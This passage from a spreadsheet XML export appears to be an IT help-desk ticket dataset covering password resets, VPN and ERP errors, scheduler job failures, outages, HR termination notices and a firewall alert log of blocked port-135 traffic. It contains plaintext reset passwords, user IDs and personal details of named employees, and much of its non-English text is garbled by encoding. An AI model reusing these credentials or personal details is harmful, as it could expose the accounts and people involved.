please kindly check wi-fi speed for our company. it's very slow speed and impacted our work this time. 
we have more users in office about 20 persons and some guests visit sometime. please advise suitable package for our company. 
------------------------------------
dear nagfghtyudra,
attached currently internet package in apac office. please advise if we need to up speed for international gate. </t>
  </si>
  <si>
    <t>setup new ws \stwpzxbf bjehirkx</t>
  </si>
  <si>
    <t>stwpzxbf bjehirkx</t>
  </si>
  <si>
    <t>aenderungsantrag kann nicht geloescht werden.</t>
  </si>
  <si>
    <t>gusyjcer lvbxfimr</t>
  </si>
  <si>
    <t>probleme mit purchasing \xmlbfjpg yegzbvru</t>
  </si>
  <si>
    <t>setup new ws \ghaltiek lsuepvyx</t>
  </si>
  <si>
    <t>net weaver business client does not work.</t>
  </si>
  <si>
    <t>net weaver business client does not work. _x000D_
error : ms .net framdntyework 4.5.2</t>
  </si>
  <si>
    <t>mobile device (company owned) successfully activated.</t>
  </si>
  <si>
    <t xml:space="preserve">engineering tool is not working </t>
  </si>
  <si>
    <t>pftsgqmc zcqiwatg</t>
  </si>
  <si>
    <t>authorisation error in outlook : nicht lizeciertes produkt.</t>
  </si>
  <si>
    <t>ukwfgxrl rieqbtnp</t>
  </si>
  <si>
    <t xml:space="preserve">probleme mit EU_tool rechner \ we212772 </t>
  </si>
  <si>
    <t xml:space="preserve">moin ,_x000D_
_x000D_
kannst du bitte das passwort freischalten. benutzer we212772 wurde das passwort _x000D_
gesperrt. bitte das passwort auf welcome setzen._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>wjzvabrl bmcfrlyz</t>
  </si>
  <si>
    <t>erp SID_34 password reset request for user : beckes</t>
  </si>
  <si>
    <t>probleme mit datenbank in EU_tool \hgrvubzo wgyhktic</t>
  </si>
  <si>
    <t>mail address of cytohwau qfunricw at ticketing_tool is missing</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: qdxyifhj.zbwtunpy@gmail.com_x000D_
_x000D_
in ticketing_tool is for user cytohwau qfunricw no email available. see picture._x000D_
_x000D_
[cid:image001.png@01d1f6e2.c3dff050]_x000D_
_x000D_
_x000D_
mit freundlichen grÃ¼ÃŸen / best </t>
  </si>
  <si>
    <t>crm not working</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: vomtbcej.lyiwqrct@gmail.com_x000D_
_x000D_
dear sir;_x000D_
_x000D_
i had tried to open crm. please see here the attachment for the message while opening the same._x000D_
_x000D_
_x000D_
[cid:image001.jpg@01d1f6ff.3cddd780]_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>abended job in job_scheduler: Job_593</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: Job_593 at 08/15/16 04:06:29</t>
  </si>
  <si>
    <t>business_client brings error when launched</t>
  </si>
  <si>
    <t>nuksytoh whovmtez</t>
  </si>
  <si>
    <t>programdnty zmmtaxupd : sales organization selection crieria doesnt work; please disable programdnty temporarlly</t>
  </si>
  <si>
    <t>programdnty zmmtaxupd updates tax classification for all the sales organization irrespective of selection criteria; programdnty exection impacts apo jobs; for india sales org, there are two tax classifications fields which were updated with incorrect values last week</t>
  </si>
  <si>
    <t>windows account locked in ad</t>
  </si>
  <si>
    <t>tkglinmz dktpawfm</t>
  </si>
  <si>
    <t>user is getting unlicensed error in office</t>
  </si>
  <si>
    <t>seyhanlk nuazwxgq</t>
  </si>
  <si>
    <t>ç­”å¤: email address link to delivery not è½¬å‘: 9168020730//supply_chaint09t308lf kc5010çš„å¿«é€’å•å·å‡ºæ¥äº†å—ï¼Ÿ</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: jkmeusfq.vjpckzsa@gmail.com_x000D_
_x000D_
helloï¼Œ_x000D_
è¯·å‚¬ä¸€ä¸‹æ–°åŠ å¡ã€‚è°¢è°¢ï¼_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
é¡ºç¥å•†ç¥º_x000D_
best </t>
  </si>
  <si>
    <t>jkmeusfq vjpckzsa</t>
  </si>
  <si>
    <t>not able to view attachments from outlook</t>
  </si>
  <si>
    <t>pc ewkw8111185 funktioniert nicht (pc lÃ¤sst sich anschalten</t>
  </si>
  <si>
    <t xml:space="preserve">von: cytohwau qfunricw 
gesendet: donnerstag, 11. august 2016 15:23
an: nwfodmhc exurcwkm
betreff: pc ewkw8111185/ qdxyifhj zbwtunpy
pc ewkw8111185 funktioniert nicht (pc lÃ¤sst sich anschalten, danach ist kein arbeiten am pc mÃ¶glich, auch mit anderer tastatur versucht, keine Ã¤nderung)
mit freundlichen grÃ¼ÃŸen
cytohwau qfunricw
grinding service germany
cytohwau.qfunricw@gmail.com
</t>
  </si>
  <si>
    <t>cytohwau qfunricw</t>
  </si>
  <si>
    <t>abended job in job_scheduler: Job_483</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: Job_483 at 08/15/16 02:52:28</t>
  </si>
  <si>
    <t>issues with posting to the hub</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: fmjeaoih.ndyezlkb@gmail.com_x000D_
_x000D_
hi all,_x000D_
i am having an issue posting news to the hub._x000D_
_x000D_
when uploading new pictures for the news carousel to the site below,_x000D_
the links which are created have no jpg ending and therefore when inserting_x000D_
to the news carousel the pictures don't show up correctly._x000D_
_x000D_
_x000D_
i would need this fixed within today as there are several news that should go out._x000D_
</t>
  </si>
  <si>
    <t>tablet - dell 7350 -æ— æ³•è¿žæŽ¥æ— çº¿wifiç½‘ç»œï¼Œæ— çº¿apï¼Œæ‰‹æœºçƒ­ç‚¹éƒ½ä¸èƒ½è¿žæŽ¥ã€‚</t>
  </si>
  <si>
    <t>please provide details of the issue._x000D_
æ— æ³•è¿žæŽ¥æ— çº¿wifiç½‘ç»œï¼Œæ— çº¿apï¼Œæ‰‹æœºçƒ­ç‚¹éƒ½ä¸èƒ½è¿žæŽ¥ã€‚</t>
  </si>
  <si>
    <t>locked out of account</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ubdihsop.ahyeqpmx@gmail.com_x000D_
_x000D_
hi,_x000D_
_x000D_
please assist vnglqiht sebxvtdj to access his account as he forgot his password._x000D_
_x000D_
we need this urgent please?_x000D_
_x000D_
kind </t>
  </si>
  <si>
    <t>require set up mobile link company e-mail</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: przndfbo.pldqbhtn@gmail.com
it,
please kindly set up mobile link company e-mail.
user : fbmugzrl ahyiuqev
model :iphone6 (16 gb)
</t>
  </si>
  <si>
    <t>oa35818597, inwarehouse_tool 0158921930 was created but no accounting document. please double check and help to solve this proble</t>
  </si>
  <si>
    <t>oa35818597, inwarehouse_tool 0158921930 was created but no accounting document. please double check and help to solve this problem.</t>
  </si>
  <si>
    <t>vpn ä¸èƒ½ç™»å½•ï¼Œç½‘é¡µä¸€ç›´åœ¨æ£€æŸ¥é˜²ç—…æ¯’è½¯ä»¶ã€‚</t>
  </si>
  <si>
    <t>eokwmfay ewbltgha</t>
  </si>
  <si>
    <t>æ–‡ä»¶æ— æ³•é€šè¿‡æ‰“å°æœºfe08æ‰“å°</t>
  </si>
  <si>
    <t>erp can not print by fe08. please help me switch to fe10 print. it is urgent.</t>
  </si>
  <si>
    <t>zreijwsb jnrxugpd</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: rxoynvgi.ntgdsehl@gmail.com
hi ti team
need your assistant on the attached issue.
hydstheud mddwwyleh
operation supervisor
company distribution services of asia pte ltd
( asia regional distribution centre)
email : rxoynvgi.ntgdsehl@gmail.com&lt;mailto:rxoynvgi.ntgdsehl@gmail.com&gt;</t>
  </si>
  <si>
    <t>damaged laptop</t>
  </si>
  <si>
    <t xml:space="preserve">from: zrpemyab xvzwcbha 
sent: monday, august 15, 2016 7:02 am
to: nwfodmhc exurcwkm; bmhxwvys tdmgolwn; bmhxwvys tdmgolwn
subject: rad:fw: damaged laptop
dear it help,
please help suhrhtyju to sort out issue with his laptop.
he is based in indonesia
his contact details are as mentioned below
suhrhtyju
application engineer 
bmhxwvys.tdmgolwn@gmail.com
</t>
  </si>
  <si>
    <t>zrpemyab xvzwcbha</t>
  </si>
  <si>
    <t>windows ç³»ç»Ÿæ— æ³•ç™»å½•æç¤ºè®¡ç®—æœºä¸Žä¸»åŸŸä¹‹å‰ä¿¡ä»»å…³ç³»å¤±è´¥</t>
  </si>
  <si>
    <t>gdyicrel kvtlodsx</t>
  </si>
  <si>
    <t>erp purchasing error</t>
  </si>
  <si>
    <t>when i tried to submit the "describe what you need" it shows"no data found for employee '1111154833'; inform system administration" please help with it i have several orders to send outï¼this problem has been existed for a week and no one contact me to solve itï¼</t>
  </si>
  <si>
    <t>æ˜¾ç¤ºå™¨ä¸äº®</t>
  </si>
  <si>
    <t>æ—©ä¸Šå¼€æœºåŽæ˜¾ç¤ºå™¨ä¸å‡ºå›¾åƒã€‚</t>
  </si>
  <si>
    <t>wgmqlnzh vpebwoat</t>
  </si>
  <si>
    <t>vpn connection issue_x000D_
-connected to the user system using teamviewer._x000D_
-installed the company vpn drivers._x000D_
-caller confirmed that he was able to login._x000D_
-issue resolved.</t>
  </si>
  <si>
    <t>abended job in job_scheduler: Job_3186</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: Job_3186 at 08/14/16 20:01:28</t>
  </si>
  <si>
    <t>abended job in job_scheduler: Job_2114</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: Job_2114 at 08/14/16 17:32:28</t>
  </si>
  <si>
    <t>queue 'dmz_all' failed to connect to hub /lhqsm665dom/HostName_772/HostName_772/hub</t>
  </si>
  <si>
    <t>observing below alert in reporting_tool since 7:33 am on 8/14 et after reporting_tool reboot_x000D_
_x000D_
queue 'dmz_all' failed to connect to hub /lhqsm665dom/HostName_772/HostName_772/hub</t>
  </si>
  <si>
    <t>sao-palo-2960-switch-i(45.25.35.049) is down since 8:00 am on 08/14 et</t>
  </si>
  <si>
    <t>error login on to the SID_34 system._x000D_
-verified user details.(employee# &amp; manager name)_x000D_
-unlocked and reset the erp id to"daypay3"._x000D_
-caller confirmed that he was able to login._x000D_
-issue resolved.</t>
  </si>
  <si>
    <t>mbwgkint wjrokfub</t>
  </si>
  <si>
    <t>abended job in job_scheduler: snp_heu_5_regen</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: snp_heu_5_regen at 08/14/16 12:40:30</t>
  </si>
  <si>
    <t>problem with sending discount request</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: vkzwafuh.tcjnuswg@gmail.com
hi,
i'm having a problem with sending discount requests. i get the below error when i hit submit request. i had this problem last week but when i connected to vpn it sent the request. i thought the problem was solved but it is still happening. please advise.
[cid:image001.jpg@01d1f61a.0223ac90]
vkzwafuh tcjnuswg - cmp
sr. application eng.
vkzwafuh.tcjnuswg@gmail.com
</t>
  </si>
  <si>
    <t>na production files not received</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: rdfjsawg.zpmxgdcw@gmail.com_x000D_
_x000D_
assign to  pi  team. files not transferred as per schedule. even last week we had the same problem._x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>GRP_71</t>
  </si>
  <si>
    <t>office 365 sprache Ã¤ndern/ videos aus "thehub" funktionieren nicht.</t>
  </si>
  <si>
    <t>hallo, ist es mÃ¶glich das ich office365 von englisch auf deutsch umstelle? wenn ja wo finde ich diese einstellung?_x000D_
_x000D_
wenn ich die videos von "lets talk"  in deutsch ansehen mÃ¶chte und diese Ã¼ber den link in der email anklicke sagt er mir:_x000D_
_x000D_
office 365 video isn't available _x000D_
_x000D_
office 365 video is not enabled by your organization for you. _x000D_
_x000D_
hier ein link:_x000D_
_x000D_
vielen dank fÃ¼r ihre hilfe</t>
  </si>
  <si>
    <t>xbyudksw zbfxlmus</t>
  </si>
  <si>
    <t>abended job in job_scheduler: snp_heu_1_regen</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: snp_heu_1_regen at 08/14/16 05:51:27</t>
  </si>
  <si>
    <t>abended job in job_scheduler: bk_hana_SID_62_erp_wly_dp</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: bk_hana_SID_62_erp_wly_dp at 08/14/16 05:03:28</t>
  </si>
  <si>
    <t>abended job in job_scheduler: SID_37hoti</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: SID_37hoti at 08/14/16 05:03:28</t>
  </si>
  <si>
    <t>HostName_216 (erp-SID_51 aprtgghj4k- production): average (1 samples) disk free on /home is now 13%</t>
  </si>
  <si>
    <t>HostName_216 (erp-SID_51 aprtgghj4k- production):  average (1 samples) disk free on /home is now 13%, which is below the warning threshold (15%) out of total size 0.5 gb</t>
  </si>
  <si>
    <t>HostName_214 (erp-SID_51 app1-production): average (1 samples) disk free on /home is now 15%</t>
  </si>
  <si>
    <t>HostName_214 (erp-SID_51 app1-production):  average (1 samples) disk free on /home is now 15%, which is below the warning threshold (15%) out of total size 0.5 gb</t>
  </si>
  <si>
    <t>HostName_768(corporate file server (teams) - production): server is inactive</t>
  </si>
  <si>
    <t>abended job in job_scheduler: Job_1343</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: Job_1343 at 08/14/16 01:39:32</t>
  </si>
  <si>
    <t>abended job in job_scheduler: SID_9cold</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: SID_9cold at 08/14/16 01:11:30</t>
  </si>
  <si>
    <t>abended job in job_scheduler: SID_23cold</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: SID_23cold at 08/13/16 21:40:28</t>
  </si>
  <si>
    <t>network drives disconnected</t>
  </si>
  <si>
    <t xml:space="preserve">unable to connect to t drive </t>
  </si>
  <si>
    <t>abended job in job_scheduler: SID_29cold</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: SID_29cold at 08/13/16 20:56:26</t>
  </si>
  <si>
    <t>abended job in job_scheduler: SID_32cold</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: SID_32cold at 08/13/16 20:56:26</t>
  </si>
  <si>
    <t>abended job in job_scheduler: Job_727</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: Job_727 at 08/13/16 20:53:27</t>
  </si>
  <si>
    <t>HostName_1238 ( south_amerirtca, br -plm dsc file - production) dsccache.exe: wrong number of instances of process dsccache.exe</t>
  </si>
  <si>
    <t xml:space="preserve">HostName_1238 ( south_amerirtca, br -plm dsc file - production) dsccache.exe: wrong number of instances of process dsccache.exe, expected instances gte 1 but found 0 _x000D_
_x000D_
note: there was a planned power maintenance at south_amerirtca as per chg1144678 service did not come up after the maintenance._x000D_
</t>
  </si>
  <si>
    <t>abended job in job_scheduler: Job_717</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: Job_717 at 08/13/16 20:38:26</t>
  </si>
  <si>
    <t>abended job in job_scheduler: SID_36cold</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: SID_36cold at 08/13/16 20:23:27</t>
  </si>
  <si>
    <t>abended job in job_scheduler: Job_571</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: Job_571 at 08/13/16 20:23:27</t>
  </si>
  <si>
    <t>abended job in job_scheduler: SID_48cold</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: SID_48cold at 08/13/16 20:22:26</t>
  </si>
  <si>
    <t>abended job in job_scheduler: SID_43cold</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: SID_43cold at 08/13/16 20:16:27</t>
  </si>
  <si>
    <t>abended job in job_scheduler: SID_50cold</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: SID_50cold at 08/13/16 20:14:27</t>
  </si>
  <si>
    <t>abended job in job_scheduler: Job_737</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: Job_737 at 08/13/16 20:11:27</t>
  </si>
  <si>
    <t>abended job in job_scheduler: SID_79cold</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: SID_79cold at 08/13/16 20:11:27</t>
  </si>
  <si>
    <t>abended job in job_scheduler: SID_27hot</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: SID_27hot at 08/13/16 20:09:27</t>
  </si>
  <si>
    <t>mii login issue</t>
  </si>
  <si>
    <t>mii login issue._x000D_
-verified user details.(employee# &amp; manager name)_x000D_
-checked the user name in ad and reset the password._x000D_
-advised the user to login and check._x000D_
-caller confirmed that she was able to login._x000D_
-issue resolved.</t>
  </si>
  <si>
    <t>lbtverxc ymgljuqn</t>
  </si>
  <si>
    <t>abended job in job_scheduler: SID_35cold</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: SID_35cold at 08/13/16 19:15:25</t>
  </si>
  <si>
    <t>:i am getting the following message when trying to log in to SID_34. logon balancing error 88:  could not connect to messag</t>
  </si>
  <si>
    <t>name:htsnaodb adjtmlzn
language:
browser:microsoft internet explorer
email:karghyuen.hasghyusan@company.como
customer number:
telephone:
summary:i am getting the following message when trying to log in to SID_34. logon balancing error 88:  could not connect to message server.  is erp down right now?</t>
  </si>
  <si>
    <t>HostName_1015: average (4 samples) disk free on m:\ is now 15%, which is below the warning threshold (15%)</t>
  </si>
  <si>
    <t>HostName_1015: average (4 samples) disk free on m:\ is now 15%, which is below the warning threshold (15%) out of total size 139.4 gb</t>
  </si>
  <si>
    <t>job in job_scheduler: Job_2080 was running long.</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: Job_2080 was running longer &gt; 60min. kirtyled and restarted.</t>
  </si>
  <si>
    <t>abended job in job_scheduler: Job_1989</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: Job_1989 at 08/13/16 06:19:28</t>
  </si>
  <si>
    <t>abended job in job_scheduler: Job_1907</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: Job_1907 at 08/13/16 06:18:28</t>
  </si>
  <si>
    <t>abended job in job_scheduler: Job_1949</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: Job_1949 at 08/13/16 06:17:28</t>
  </si>
  <si>
    <t>reset passwords for jcmxerol nbfyczqr using password_management_tool password reset.</t>
  </si>
  <si>
    <t xml:space="preserve"> reset microsoft online services password for rdwpangu.lybaxonw@gmail.com</t>
  </si>
  <si>
    <t xml:space="preserve">from: microsoft on behalf of company inc. [mailto:msonlineservicesteam@microsoftonline.com] 
sent: saturday, august 13, 2016 7:24 am
to: nwfodmhc exurcwkm
cc: tiyhum kuyiomar
subject: rad:request to reset microsoft online services password for rdwpangu.lybaxonw@gmail.com
importance: high
    request to reset user's password   
   the following user in your organization has requested a password reset be performed for their account: 
â€¢ rdwpangu.lybaxonw@gmail.com 
â€¢ first name: rolghtyuando 
â€¢ last name: santolgiy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</si>
  <si>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vpn connection problem</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: cobsfvjz.apkqmrdu@gmail.com_x000D_
_x000D_
hello_x000D_
_x000D_
unable to  connect to vpn ._x000D_
_x000D_
get the below message ._x000D_
_x000D_
_x000D_
_x000D_
[cid:image001.jpg@01d1f566.c5bfdd90]_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>network outage:cantabria (mecftgobusa) - (kenci) hard down since   2:31 am  8/13/2016 est</t>
  </si>
  <si>
    <t>what type of outage:  ___x__network     _____circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    _____no____     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   _________2:31 am  8/13/2016 est_____________x000D_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___na_____     (yes/no/na) _x000D_
_x000D_
7. site contact notified (phone/email) ?  ___email______     (yes/no/na) _x000D_
_x000D_
8. remote dial-in ?   ____no_______   (yes/no/na) _x000D_
_x000D_
9. equipment reset ?    _____no______    (yes/no/na) _x000D_
_x000D_
10. verified site working on backup circuit ?  ___no____     (yes/no/na) _x000D_
_x000D_
11. vendor ticket  # ( global_telecom_1, verizon, telecom_vendor_1, telecom_vendor_2 )    __________no_______________       _x000D_
_x000D_
12. notified  gsc  ____yes____     (yes/no/na)    cert started  ?___na_____    (yes/no/na) _x000D_
_x000D_
13.  additional diagnostics</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: Job_1148 at 08/13/16 01:15:26</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: Job_1141 at 08/12/16 23:45:26</t>
  </si>
  <si>
    <t>jmuaiqol rmvethkf</t>
  </si>
  <si>
    <t>a termination for carlos patino, 11386155, effective 06/30/2016  has been approved</t>
  </si>
  <si>
    <t xml:space="preserve">from: idelcia almeida nascimento [mailto:system@hr_tool.com] _x000D_
sent: friday, august 12, 2016 9:45 pm_x000D_
to: nwfodmhc exurcwkm_x000D_
subject: rakthyesh the terminate action for carlos patino has completed._x000D_
_x000D_
hello , _x000D_
_x000D_
a termination for carlos patino, 11386155, effective 06/30/2016  has been approved._x000D_
_x000D_
click the link to view._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>wsimyhro omhnjqbw</t>
  </si>
  <si>
    <t>access denied in adoption scorecard manager</t>
  </si>
  <si>
    <t>user is unable to view adoption scorecard manager in microsoft crm dynamics, please check screenshot</t>
  </si>
  <si>
    <t>i should be able to see all my activities in crm what i created in outlook.</t>
  </si>
  <si>
    <t xml:space="preserve">hi,
i was wondering if i should be able to see all my activities in crm what i created in outlook. example  emails, task , appointments? right now i can only see my appointment as you can see below. 
uvrwikmy yusexirn
sr application technician
uvrwikmy.yusexirn@gmail.com
</t>
  </si>
  <si>
    <t>circuit outage : india, kirty telecom_vendor_1 circuit is down since 07:24pm et on 08/12.</t>
  </si>
  <si>
    <t>what type of outage:  _____network     ___x__circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ____yes_____     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   _______07:24pm et on 08/12._______________x000D_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</si>
  <si>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unable to sign in to collaboration_platform</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: hr_tooldcvcgenratn at 08/12/16 17:02:29</t>
  </si>
  <si>
    <t>analysis for office issue</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: nlearzwi.ukdzstwi@gmail.com_x000D_
_x000D_
this has been happening every time i try to filter by customer number in bex or hana. i am using both systems, primarily hana otc_billings_all, but i think the issue is regarding the client._x000D_
_x000D_
i have tried filtering by copying and pasting and also by importing a text file with the same result._x000D_
_x000D_
any idea how to fix this error? i can't find the log file it references. </t>
  </si>
  <si>
    <t>nlearzwi ukdzstwi</t>
  </si>
  <si>
    <t>phone display</t>
  </si>
  <si>
    <t xml:space="preserve">from: judi elituytt _x000D_
sent: saturday, august 13, 2016 12:06 am_x000D_
to: nmzfdlar whzbrusx; -facility; nwfodmhc exurcwkm_x000D_
subject: amar re: phone display_x000D_
_x000D_
hi johthryu â€“ we are forwarding your request to the help desk.  it help desk is the contact for any phone issues.  </t>
  </si>
  <si>
    <t>nmzfdlar whzbrusx</t>
  </si>
  <si>
    <t>termination for cyxieuwk rekwlqmu, 00064847</t>
  </si>
  <si>
    <t xml:space="preserve">hello , _x000D_
_x000D_
a termination for cyxieuwk rekwlqmu, 11175958, effective 07/02/2016  has been approved._x000D_
_x000D_
click the link to view._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>fduinmtw yofhirjs</t>
  </si>
  <si>
    <t>HostName_1289: account is locked</t>
  </si>
  <si>
    <t xml:space="preserve">HostName_1289: account is locked.. please unlock the account._x000D_
username: hq4nopr </t>
  </si>
  <si>
    <t>source ip :_x000D_
system name :_x000D_
user  name:_x000D_
location :_x000D_
sep , sms status :_x000D_
field sales user ( yes / no) :  _x000D_
dsw event log:see below_x000D_
=========================================_x000D_
_x000D_
 =========================_x000D_
incident overview_x000D_
=========================_x000D_
we have detected at least 236 occurrences of your firewall att-singapore-asa.company.com-1/54.96.80.216 dropping traffic sourcing from HostName_17/29.26.13.3095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secureworks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event id: 91557862_x000D_
event summary: internal outbreak for 135/tcp_x000D_
occurrence count: 236_x000D_
event count: 2_x000D_
_x000D_
host and connection information_x000D_
source ip: 29.26.13.3095_x000D_
source hostname: HostName_17_x000D_
source port: 58280_x000D_
destination port: 135_x000D_
connection directionality: internal_x000D_
_x000D_
device information_x000D_
device ip: 54.96.80.216_x000D_
device name: att-singapore-asa.company.com-1_x000D_
log time: 2016-08-11 at 19:45:48 utc_x000D_
action: blocked_x000D_
cvss score: -1 _x000D_
_x000D_
scwx event processing information_x000D_
sherlock rule id (sle): 537074_x000D_
inspector rule id: 186739_x000D_
inspector event id: 877942065_x000D_
ontology id: 200020003203009162_x000D_
event type id: 200020003203009062_x000D_
agent id: 103955_x000D_
_x000D_
event detail:_x000D_
aug 1sartlgeo lhqksbdx9:45:48 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/58280 dst outside:192.168.254.10/135 by access-group "acl_inside" [0x0, 0x0]_x000D_
aug 1sartlgeo lhqksbdx9:45:51 54.96.80.216 %asa-2-106001: inbound tcp connection denied from 29.26.13.3095/58285 to 10.59.24.137/135 flags syn on interface inside_x000D_
aug 1sartlgeo lhqksbdx9:45:51 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/58286 dst outside:192.168.54.59/135 by access-group "acl_inside" [0x0, 0x0]_x000D_
aug 1sartlgeo lhqksbdx9:45:51 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/58287 dst outside:192.168.1.100/135 by access-group "acl_inside" [0x0, 0x0]_x000D_
aug 1sartlgeo lhqksbdx9:45:54 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/58291 dst outside:192.168.1.87/135 by access-group "acl_inside" [0x0, 0x0]_x000D_
aug 1sartlgeo lhqksbdx9:45:56 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/58293 dst outside:192.168.0.108/135 by access-group "acl_inside" [0x0, 0x0]_x000D_
aug 1sartlgeo lhqksbdx9:45:57 54.96.80.216 %asa-2-106001: inbound tcp connection denied from 29.26.13.3095/58297 to 10.106.15.23/135 flags syn on interface inside_x000D_
aug 1sartlgeo lhqksbdx9:46:02 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/58304 dst outside:192.168.88.104/135 by access-group "acl_inside" [0x0, 0x0]_x000D_
aug 1sartlgeo lhqksbdx9:46:28 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/58330 dst outside:192.168.21.253/135 by access-group "acl_inside" [0x0, 0x0]_x000D_
aug 1sartlgeo lhqksbdx9:46:28 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/58331 dst outside:192.168.1.182/135 by access-group "acl_inside" [0x0, 0x0]_x000D_
aug 1sartlgeo lhqksbdx9:46:29 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/58333 dst outside:192.168.0.109/135 by access-group "acl_inside" [0x0, 0x0]_x000D_
aug 1sartlgeo lhqksbdx9:46:31 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/58337 dst outside:192.168.43.163/135 by access-group "acl_inside" [0x0, 0x0]_x000D_
aug 1sartlgeo lhqksbdx9:46:34 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/58343 dst outside:192.168.43.140/135 by access-group "acl_inside" [0x0, 0x0]_x000D_
aug 1sartlgeo lhqksbdx9:46:36 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/58347 dst outside:217.168.208.218/135 by access-group "acl_inside" [0x0, 0x0]_x000D_
aug 1sartlgeo lhqksbdx9:46:40 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/58357 dst outside:192.168.1.13/135 by access-group "acl_inside" [0x0, 0x0]_x000D_
aug 1sartlgeo lhqksbdx9:46:42 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/58363 dst outside:192.168.0.103/135 by access-group "acl_inside" [0x0, 0x0]_x000D_
_x000D_
_x000D_
_x000D_
event id: 91557863_x000D_
event summary: internal outbreak for 135/tcp_x000D_
occurrence count: 236_x000D_
event count: 2_x000D_
_x000D_
host and connection information_x000D_
source ip: 29.26.13.3095_x000D_
source hostname: HostName_17_x000D_
source port: 58280_x000D_
destination port: 135_x000D_
connection directionality: internal_x000D_
_x000D_
device information_x000D_
device ip: 54.96.80.216_x000D_
device name: att-singapore-asa.company.com-1_x000D_
